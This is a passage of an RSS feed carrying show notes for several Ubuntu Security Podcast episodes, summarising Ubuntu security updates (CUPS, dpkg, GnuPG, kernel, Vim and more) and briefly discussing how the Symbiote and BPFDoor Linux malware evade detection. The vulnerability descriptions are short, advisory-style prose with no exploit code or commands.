<h3 id="usn-5464-1-e2fsprogs-vulnerability-07-17">[<a href="https://ubuntu.com/security/notices/USN-5464-1">USN-5464-1</a>] E2fsprogs vulnerability [07:17]</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-1304">CVE-2022-1304</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Similarly, OOB R/W in e2fsprogs -&gt; used when doing fsck, mkfs, resizefs,
badblocks etc on crafted file system image -&gt; code execution</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="symbiote-linux-malware-analysis-07-58">Symbiote Linux malware analysis [07:58]</h3>
<ul>
<li><a href="https://www.intezer.com/blog/research/new-linux-threat-symbiote/">https://www.intezer.com/blog/research/new-linux-threat-symbiote/</a></li>
<li>Research from Intezer and Blackberry</li>
<li>Found targeting financial sector in Latin America</li>
<li>Described as &rsquo;nearly impossible&rsquo; to detect</li>
<li>Uses <code>LD_PRELOAD</code> to &lsquo;infect&rsquo; binaries on system</li>
<li>Evades detection by then hooking various functions in libc, libpcap etc
to change their behaviour and alter their output so that when running
tools like ls, ps etc they don&rsquo;t show evidence of infection</li>
<li>Also loads BPF filter to hide it&rsquo;s own network traffic from being seen
when say running a local <code>tcpdump</code> etc</li>
<li>&lsquo;Nearly impossible to detect&rsquo; claim
<ul>
<li>Indeed, is going to be very hard to detect it from the machine itself
which is compromised</li>
<li>If an attacker has control over the machine they can clearly influence
that environment to hide themselves</li>
</ul>
</li>
<li>Reminds of a recent <a href="https://twitter.com/halvarflake/status/1528660068798955520">twitter thread</a> involving halvarflake, Mathias Krause
and others, and then a follow-up <a href="https://grsecurity.net/tetragone_a_lesson_in_security_fundamentals">blog post</a> from Brad Spengler from
grsecurity looking at Tetragon eBPF Security Observability and Runtime
Environment
<ul>
<li>eBPF based system which allows sysadmins to develop policy to detect
and kill exploits</li>
<li>Runs on the system itself in kernel-space and tries to detect once a
user has elevated privileges etc
<ul>
<li>e.g. kernel memory corruption to set their own uid as 0</li>
</ul>
</li>
<li>But since the attacker has already got code execution in the kernel to
be able to achieve this they can just as easily first disable Tetragon
and then go and elevate privileges and hence not be detected</li>
</ul>
</li>
<li>Basically if you are trying to detect compromise from within the
environment itself the attacker is always at an advantage and can change
the environment to evade detection and make everything look normal /
disable checks etc</li>
<li>Instead need to be at a higher level of abstraction</li>
<li>In the case of detecting Symbiote - would need to say take a disk image
and analyse it offline from another machine so that the analysis
environment can&rsquo;t be influenced by the malware itself</li>
</ul>
<h3 id="ubuntu-21-dot-10--impish-indri--reaches-end-of-life-on-july-14-2022-12-45">Ubuntu 21.10 (Impish Indri) reaches End of Life on July 14 2022 [12:45]</h3>
<ul>
<li><a href="https://lists.ubuntu.com/archives/ubuntu-announce/2022-May/000280.html">https://lists.ubuntu.com/archives/ubuntu-announce/2022-May/000280.html</a></li>
</ul>
<h3 id="hiring-13-16">Hiring [13:16]</h3>
<h4 id="security-engineer-ubuntu">Security Engineer - Ubuntu</h4>
<ul>
<li><a href="https://canonical.com/careers/2925180/security-engineer-ubuntu-remote">https://canonical.com/careers/2925180/security-engineer-ubuntu-remote</a></li>
</ul>
<h4 id="security-certifications-product-manager-cis-fips-fedramp-and-more">Security Certifications Product Manager - CIS, FIPS, FedRAMP and more</h4>
<ul>
<li><a href="https://canonical.com/careers/3781589/security-certifications-product-manager-cis-fips-fedramp-and-more-remote">https://canonical.com/careers/3781589/security-certifications-product-manager-cis-fips-fedramp-and-more-remote</a></li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E163.mp3" length="11058577" type="audio/mpeg" /><itunes:duration>853</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 162
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-162/</link>
          <pubDate>Fri, 03 Jun 2022 16:50:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>6157df5bba6d9c3b1c2615db1b7a215e6e183a319d38fa580746810081f9b1d27fc04fba9b68728d55ea6e85f86038532a47f1da6e537b54d7c26b29c337128e</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 162</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          This week we cover security updates for dpkg, logrotate, GnuPG, CUPS,
  InfluxDB and more, plus we take a quick look at some open positions on the
  team - come join us!
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  This week we cover security updates for dpkg, logrotate, GnuPG, CUPS,
  InfluxDB and more, plus we take a quick look at some open positions on the
  team - come join us!
  </itunes:summary>
        <description>  This week we cover security updates for dpkg, logrotate, GnuPG, CUPS,
  InfluxDB and more, plus we take a quick look at some open positions on the
  team - come join us!
  </description>
        <googleplay:description>  This week we cover security updates for dpkg, logrotate, GnuPG, CUPS,
  InfluxDB and more, plus we take a quick look at some open positions on the
  team - come join us!
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we cover security updates for dpkg, logrotate, GnuPG, CUPS,
InfluxDB and more, plus we take a quick look at some open positions on the
team - come join us!</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>31 unique CVEs addressed</p>
<h3 id="usn-5446-1-usn-5446-2-dpkg-vulnerability-00-42">[<a href="https://ubuntu.com/security/notices/USN-5446-1">USN-5446-1</a>, <a href="https://ubuntu.com/security/notices/USN-5446-2">USN-5446-2</a>] dpkg vulnerability [00:42]</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-1664">CVE-2022-1664</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Directory traversal vulnerability when extracting untrusted <strong>source</strong> packages
<ul>
<li>debian source packages consist of two tarballs - orig and debian</li>
<li>orig is unpacked and then debian in unpacked on top of that - if orig
is crafted to contain a symlink which pointed to a file outside of the
source code, then when unpacking debian it will follow that symlink and
hence would overwrite arbitrary files outside the source directory</li>
<li>Only really a problem for debian/ubuntu developers</li>
</ul>
</li>
</ul>
<h3 id="usn-5447-1-logrotate-vulnerability-02-58">[<a href="https://ubuntu.com/security/notices/USN-5447-1">USN-5447-1</a>] logrotate vulnerability [02:58]</h3>
<ul>
<li>1 CVEs addressed in Impish (21.10), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-1348">CVE-2022-1348</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>logrotate creates a &lsquo;state&rsquo; file to avoid parallel executions of itself -
each instance locks this file as a mutex mechanism</li>
<li>if this doesn&rsquo;t exist, it gets created - <strong>but</strong> is created world readable -
which allows unprivileged users to take the lock on this file</li>
<li>as such the real logrotate will fail to run since it can&rsquo;t get the lock
-&gt; DoS</li>
</ul>
<h3 id="usn-5402-2-openssl-vulnerabilities-04-13">[<a href="https://ubuntu.com/security/notices/USN-5402-2">USN-5402-2</a>] OpenSSL vulnerabilities [04:13]</h3>
<ul>
<li>2 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-1473">CVE-2022-1473</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1292">CVE-2022-1292</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-159/">Episode 159</a></li>
</ul>
<h3 id="usn-5448-1-ncurses-vulnerabilities-04-21">[<a href="https://ubuntu.com/security/notices/USN-5448-1">USN-5448-1</a>] ncurses vulnerabilities [04:21]</h3>
<ul>
<li>11 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2017-13728">CVE-2017-13728</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-11113">CVE-2017-11113</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-13734">CVE-2017-13734</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-13733">CVE-2017-13733</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-13732">CVE-2017-13732</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-13731">CVE-2017-13731</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-13730">CVE-2017-13730</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-13729">CVE-2017-13729</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-11112">CVE-2017-11112</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-10685">CVE-2017-10685</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-10684">CVE-2017-10684</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Crafted inputs could cause ncurses to crash - most of these were found
via fuzzing and are stack buffer overflows - these are generally
mitigated via stack-protector, others are NULL ptr deref, but again same
outcome (crash -&gt; DoS)</li>
<li>Possible infinite loop as well -&gt; cpu based DoS</li>
</ul>
<h3 id="usn-5449-1-libxv-vulnerability-04-58">[<a href="https://ubuntu.com/security/notices/USN-5449-1">USN-5449-1</a>] libXv vulnerability [04:58]</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2016-5407">CVE-2016-5407</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Remove X server could trigger OOB read in the X client via crafted
response -&gt; crash -&gt; DoS</li>
</ul>
<h3 id="usn-5431-1-gnupg-vulnerability-04-24">[<a href="https://ubuntu.com/security/notices/USN-5431-1">USN-5431-1</a>] GnuPG vulnerability [04:24]</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-13050">CVE-2019-13050</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Weakness in PGP/SKS keyserver design - if a key/certificate has many
signatures, GnuPG will take an inordinate amount of time to process these
when downloading the key from the keyserver -&gt; DoS
<ul>
<li>Certificate spamming attack - anyone can sign someone else&rsquo;s cert
thereby attaching another signature to it on the SKS keyserver network</li>
<li>The OpenPGP spec doesn&rsquo;t limit the number of signatures (but SKS
keyserver network does - 150k)</li>
<li>So anyone can poison someone else&rsquo;s cert by attaching a large number of
signatures to it</li>
<li>GnuPG would download <strong>all</strong> of these signatures when importing a key <strong>and</strong>
then proceed to validate them all
<ul>
<li>Also would do this when say validating a signature from that poisoned
cert</li>
</ul>
</li>
</ul>
</li>
<li>Fixed to not import key signatures by default anymore and to then
fallback to only import self-signatures on large keyblocks</li>
</ul>
<h3 id="usn-5452-1-ntfs-3g-vulnerability-07-55">[<a href="https://ubuntu.com/security/notices/USN-5452-1">USN-5452-1</a>] NTFS-3G vulnerability [07:55]</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-46790">CVE-2021-46790</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><code>ntfsck</code> tool failed to perform proper bounds checking on filesystem
metadata - if could trick a user into running it on an untrusted
filesystem image could then possibly get code execution
<ul>
<li>Upstream have deprecated this tool and it is only present in the
<code>ntfs-3g-dev</code> package which is not installed by default</li>
</ul>
</li>
</ul>
<h3 id="usn-5453-1-freetype-vulnerability-08-38">[<a href="https://ubuntu.com/security/notices/USN-5453-1">USN-5453-1</a>] FreeType vulnerability [08:38]</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-27406">CVE-2022-27406</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>OOB read when processing a crafted font file -&gt; DoS</li>
</ul>
<h3 id="usn-5454-1-usn-5454-2-cups-vulnerabilities-08-50">[<a href="https://ubuntu.com/security/notices/USN-5454-1">USN-5454-1</a>, <a href="https://ubuntu.com/security/notices/USN-5454-2">USN-5454-2</a>] CUPS vulnerabilities [08:50]</h3>
<ul>
<li>3 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-10001">CVE-2020-10001</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-8842">CVE-2019-8842</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-26691">CVE-2022-26691</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Upstream Apple advisory describes this as:
<ul>
<li>&ldquo;Logic issue addressed with improved state management&hellip; An application
may be able to gain elevated privileges&rdquo;</li>
</ul>
</li>
<li>Looks like it was discovered by <a href="https://github.com/mandiant/Vulnerability-Disclosures/blob/master/2022/MNDT-2022-0026/MNDT-2022-0026.md">Mandiant</a>
<ul>
<li>CUPS provides the ability to authenticate via Basic Web Authentication
or through a 32-byte randomly generated token created at runtime</li>
<li>Comparison function would only compare the supplied token value against
the real one based on the length of the shortest input - so if supplied
an empty string then would compare 0 bytes of the two and return
success!</li>
</ul>
</li>
<li>Other two issues were memory handling issues in IPP printing - could
submit a print job which would cause an OOB read in CUPS -&gt; crash -&gt; DoS</li>
</ul>
<h3 id="usn-5451-1-influxdb-vulnerability-10-39">[<a href="https://ubuntu.com/security/notices/USN-5451-1">USN-5451-1</a>] InfluxDB vulnerability [10:39]</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-20933">CVE-2019-20933</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Similar authentication bug in InfluxDB - could bypass authentication by
supplying a JWT token with an empty SharedSecret</li>
</ul>
<h3 id="usn-5442-2-linux-kernel-vulnerabilities-11-06">[<a href="https://ubuntu.com/security/notices/USN-5442-2">USN-5442-2</a>] Linux kernel vulnerabilities [11:06]</h3>
<ul>
<li>3 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-30594">CVE-2022-30594</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1116">CVE-2022-1116</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-29581">CVE-2022-29581</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.4 - GCP/GKE/IBM/Oracle/Raspi</li>
<li>Bing-Jhong Billy Jheng found integer overflow in <code>io_uring</code> - an
unprivileged user can spam requests which would eventually overflow
counter and then could be used to trigger an OOB write -&gt; controlled
memory corruption -&gt; privesc
<ul>
<li>Not the first bug in <code>io_uring</code> found by this researcher -
<a href="https://seclists.org/oss-sec/2021/q2/127">https://seclists.org/oss-sec/2021/q2/127</a></li>
</ul>
</li>
<li>Similarly, Jann Horn (GPZ) found kernel didn&rsquo;t properly check privileges
of a process when allowing it to set a flag which would then disable
seccomp filters on another process or itself
<ul>
<li>Could then allow an unprivileged process to turn of seccomp for itself
/ other processes and allow them to bypass intended access restrictions</li>
</ul>
</li>
<li>Regular kernel security bug - ref count issue in network queueing
subsystem -&gt; UAF - able to be triggered by a local attacker -&gt; crash /
code execution</li>
</ul>
<h3 id="usn-5443-2-linux-kernel-vulnerabilities-12-47">[<a href="https://ubuntu.com/security/notices/USN-5443-2">USN-5443-2</a>] Linux kernel vulnerabilities [12:47]</h3>
<ul>
<li>2 CVEs addressed in Focal (20.04 LTS), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-30594">CVE-2022-30594</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-29581">CVE-2022-29581</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.13 Oracle/GCP</li>
</ul>
<h3 id="usn-5457-1-webkitgtk-vulnerabilities-12-58">[<a href="https://ubuntu.com/security/notices/USN-5457-1">USN-5457-1</a>] WebKitGTK vulnerabilities [12:58]</h3>
<ul>
<li>5 CVEs addressed in Focal (20.04 LTS), Impish (21.10), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-26719">CVE-2022-26719</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-26717">CVE-2022-26717</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-26716">CVE-2022-26716</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-26709">CVE-2022-26709</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-26700">CVE-2022-26700</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Latest webkit point release - usual mix of issues fixed - XSS, DoS, RCE
etc</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="hiring">Hiring</h3>
<h4 id="security-engineer-ubuntu-13-25">Security Engineer - Ubuntu [13:25]</h4>
<ul>
<li><a href="https://canonical.com/careers/2925180/security-engineer-ubuntu-remote">https://canonical.com/careers/2925180/security-engineer-ubuntu-remote</a></li>
</ul>
<h4 id="security-certifications-product-manager-cis-fips-fedramp-and-more-14-24">Security Certifications Product Manager - CIS, FIPS, FedRAMP and more [14:24]</h4>
<ul>
<li><a href="https://canonical.com/careers/3781589/security-certifications-product-manager-cis-fips-fedramp-and-more-remote">https://canonical.com/careers/3781589/security-certifications-product-manager-cis-fips-fedramp-and-more-remote</a></li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E162.mp3" length="11996727" type="audio/mpeg" /><itunes:duration>938</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 161
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-161/</link>
          <pubDate>Fri, 27 May 2022 14:54:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>520d7f7072e0fcfeed66c41890367aa505ada6cfe78f98a2fc0841168024f0e9d0ef6d085a05b07306cbe53eaef4f86196872d1834bde3f3c255d717cd20ea7e</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 161</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          This week we take a look into BPFDoor, a newsworthy backdoor piece of
  malware which has been targeting Linux machines, plus we cover security
  updates for Bind, Vim, Firefox, PostgreSQL and more.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  This week we take a look into BPFDoor, a newsworthy backdoor piece of
  malware which has been targeting Linux machines, plus we cover security
  updates for Bind, Vim, Firefox, PostgreSQL and more.
  </itunes:summary>
        <description>  This week we take a look into BPFDoor, a newsworthy backdoor piece of
  malware which has been targeting Linux machines, plus we cover security
  updates for Bind, Vim, Firefox, PostgreSQL and more.
  </description>
        <googleplay:description>  This week we take a look into BPFDoor, a newsworthy backdoor piece of
  malware which has been targeting Linux machines, plus we cover security
  updates for Bind, Vim, Firefox, PostgreSQL and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we take a look into BPFDoor, a newsworthy backdoor piece of
malware which has been targeting Linux machines, plus we cover security
updates for Bind, Vim, Firefox, PostgreSQL and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>32 unique CVEs addressed</p>
<h3 id="usn-5429-1-bind-vulnerability-00-38">[<a href="https://ubuntu.com/security/notices/USN-5429-1">USN-5429-1</a>] Bind vulnerability [00:38]</h3>
<ul>
<li>1 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-1183">CVE-2022-1183</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Only affects most recent releases</li>
<li>When using bind configured with DNS over HTTPS (DoH) possible for a
client to cause the server to terminate a TLS connection early and hence
trigger an assertion failure within Bind -&gt; terminates -&gt; DoS</li>
</ul>
<h3 id="usn-5430-1-gnome-settings-vulnerability-01-18">[<a href="https://ubuntu.com/security/notices/USN-5430-1">USN-5430-1</a>] GNOME Settings vulnerability [01:18]</h3>
<ul>
<li>1 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-1736">CVE-2022-1736</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>GNOME includes support for desktop sharing via RDP + VNC</li>
<li>By default in Ubuntu we have a <a href="https://wiki.ubuntu.com/Security/Features#ports">no open ports policy</a>)</li>
<li>However, GNOME settings daemon contained a logic flaw where when
disabling the remote desktop service via the gnome-control-center UI it
would then automatically get re-enabled on next login</li>
</ul>
<h3 id="usn-5424-2-openldap-vulnerability-01-57">[<a href="https://ubuntu.com/security/notices/USN-5424-2">USN-5424-2</a>] OpenLDAP vulnerability [01:57]</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-29155">CVE-2022-29155</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-160/">Episode 160</a></li>
<li>SQL injection in the sql backend of slapd via an SQL statement within a LDAP query</li>
</ul>
<h3 id="usn-5433-1-vim-vulnerabilities-02-20">[<a href="https://ubuntu.com/security/notices/USN-5433-1">USN-5433-1</a>] Vim vulnerabilities [02:20]</h3>
<ul>
<li>9 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-1154">CVE-2022-1154</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0318">CVE-2022-0318</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0261">CVE-2022-0261</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-4192">CVE-2021-4192</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-4069">CVE-2021-4069</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-4019">CVE-2021-4019</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3984">CVE-2021-3984</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3974">CVE-2021-3974</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3973">CVE-2021-3973</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>All various instances of memory corruption vulnerabilities, where if a
user was tricked into opening a specially crafted file, could then either
crash Vim or possibly get code execution as the user
<ul>
<li>Whilst a lot of regular desktop users may not use Vim, is still often
used by sysadmins to edit config files / inspect other files which they
find on the machine - and in that case, this can then be a good privesc
target</li>
</ul>
</li>
</ul>
<h3 id="usn-5432-1-libpng-vulnerabilities-03-01">[<a href="https://ubuntu.com/security/notices/USN-5432-1">USN-5432-1</a>] libpng vulnerabilities [03:01]</h3>
<ul>
<li>2 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-14048">CVE-2018-14048</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-12652">CVE-2017-12652</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Speaking of specially crafted files :) - same for libpng - is used by
many other higher level libraries / applications</li>
</ul>
<h3 id="usn-5434-1-firefox-vulnerabilities-03-20">[<a href="https://ubuntu.com/security/notices/USN-5434-1">USN-5434-1</a>] Firefox vulnerabilities [03:20]</h3>
<ul>
<li>2 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-1802">CVE-2022-1802</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1529">CVE-2022-1529</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>100.0.2</li>
<li>2 vulns courtesy of ZDIs Pwn2Own - Manfred Paul - achieved code execution
within the privileged component of Firefox thereby escaping Firefox&rsquo;s
internal sandbox - awarded $100k USD</li>
</ul>
<h3 id="usn-5435-1-thunderbird-vulnerabilities-03-57">[<a href="https://ubuntu.com/security/notices/USN-5435-1">USN-5435-1</a>] Thunderbird vulnerabilities [03:57]</h3>
<ul>
<li>11 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-19916">CVE-2022-19916</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1802">CVE-2022-1802</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1529">CVE-2022-1529</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1520">CVE-2022-1520</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-29917">CVE-2022-29917</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-29916">CVE-2022-29916</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-29914">CVE-2022-29914</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-29913">CVE-2022-29913</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-29912">CVE-2022-29912</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-29911">CVE-2022-29911</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-29909">CVE-2022-29909</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>91.9.1</li>
<li>Same as above plus a bunch of other recent vulns in Firefox which also
apply to TB as well as a TB specific issue where it would show the wrong
security status for a signed/encrypted attached message and hence could
allow an attacker to trick the user into thinking the message was
trustworthy</li>
</ul>
<h3 id="usn-5436-1-libxrender-vulnerabilities-04-28">[<a href="https://ubuntu.com/security/notices/USN-5436-1">USN-5436-1</a>] libXrender vulnerabilities [04:28]</h3>
<ul>
<li>2 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2016-7950">CVE-2016-7950</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2016-7949">CVE-2016-7949</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Remote X server could trigger OOB write -&gt; memory corruption -&gt; code
execution</li>
</ul>
<h3 id="usn-5437-1-libxfixes-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-5437-1">USN-5437-1</a>] libXfixes vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2016-7944">CVE-2016-7944</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>32-bit platform specific issue - but roughly same as above</li>
</ul>
<h3 id="usn-5438-1-htmldoc-vulnerability-04-46">[<a href="https://ubuntu.com/security/notices/USN-5438-1">USN-5438-1</a>] HTMLDOC vulnerability [04:46]</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-23165">CVE-2021-23165</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Used to covert HTML/Markdown files to generate EPUB/HTML/PS/PDF with ToC
etc</li>
<li>Crafted HTML file could trigger a heap buffer overflow -&gt; crash/code
execution</li>
</ul>
